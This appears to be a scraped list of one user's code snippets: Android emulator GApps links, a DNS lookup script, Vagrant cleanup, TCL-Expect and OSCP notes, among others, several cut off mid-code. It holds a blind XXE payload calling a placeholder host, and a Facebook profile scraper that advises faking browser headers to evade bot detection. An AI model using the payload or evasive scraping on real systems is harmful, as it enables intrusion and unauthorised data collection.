Chan9390

NOTE: Easier way is the X86 way, described on https://www.genymotion.com/help/desktop/faq/#google-play-services

Download the following ZIPs:
    
    ARM Translation Installer v1.1 (http://www.mirrorcreator.com/files/0ZIO8PME/Genymotion-ARM-Translation_v1.1.zip_links)
    
    Download the correct GApps for your Android version:
      Google Apps for Android 6.0 (https://www.androidfilehost.com/?fid=24052804347835438 - benzo-gapps-M-20151011-signed-chroma-r3.zip)
      Google Apps for Android 5.1 (https://www.androidfilehost.com/?fid=96042739161891406 - gapps-L-4-21-15.zip)
      Google Apps for Android 5.0 (https://www.androidfilehost.com/?fid=95784891001614559 - gapps-lp-20141109-signed.zip)

Chan9390

import socket

with open('file.txt', 'r') as f:
  t = f.read().split('\n')
  for a in range(0, len(t)):
    if t[a] != '':
      try:
        temp = t[a].split(' ')[0][:-1]
        ip = socket.gethostbyname(temp)
        print temp + ' ' + ip

Chan9390

GSoC 2017

My works:

Closed multiple issues

• #70 - waiting for ssh become available
• #74 - Tomcat Server Failure with provisioning 'C:\ProgramData\chocolatey\lib\Tomcat\tools\chocolateyInstall.ps1'
• #90 - Vagrant up errors - Kali
• #95 - killed it in the end while exporting .ovf file
• #102 - microsoft_updates.bat fails

Chan9390

#!/bin/sh

# Credits to:
#  - http://vstone.eu/reducing-vagrant-box-size/
#  - https://github.com/mitchellh/vagrant/issues/343

aptitude -y purge ri
aptitude -y purge installation-report landscape-common wireless-tools wpasupplicant ubuntu-serverguide
aptitude -y purge python-dbus libnl1 python-smartpm python-twisted-core libiw30
aptitude -y purge python-twisted-bin libdbus-glib-1-2 python-pexpect python-pycurl python-serial python-gobject python-pam python-openssl libffi5

Chan9390

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

Chan9390

import requests
from bs4 import BeautifulSoup as bs

profile = "https://www.facebook.com/<profile_name>"

r = requests.get(profile, headers=headers)
soup = bs(r.text, "lxml")
m = soup.find("img", {"class":"profilePic img"})
info = m.get('alt')
print info

Chan9390

import requests
from bs4 import BeautifulSoup as bs

profile = "https://www.facebook.com/<profile_name>"

headers = {
	'accept':'*/*',
	'accept-language':'en-US,en;q=0.8',
	'User-Agent': 'Put any authentic header here. If not, facebook can understand this is bot script and the details will be striped',
	'referer':profile

Chan9390

Intro

TCL-Expect scripts are an amazingly easy way to script out laborious tasks in the shell when you need to be interactive with the console. Think of them as a "macro" or way to programmaticly step through a process you would run by hand. They are similar to shell scripts but utilize the .tcl extension and a different #! call.

Setup Your Script

The first step, similar to writing a bash script, is to tell the script what it's executing under. For expect we use the following:

#!/usr/bin/expect

Chan9390

How to pass the OSCP

1. Recon
2. Find vuln
3. Exploit
4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

Chan9390

import jeb.api.IScript;
import jeb.api.JebInstance;
import jeb.api.ast.*;
import jeb.api.ast.Class;
import jeb.api.dex.*;
import jeb.api.ui.JavaView;
import jeb.api.ui.View;

import java.util.Arrays;
import java.util.HashMap;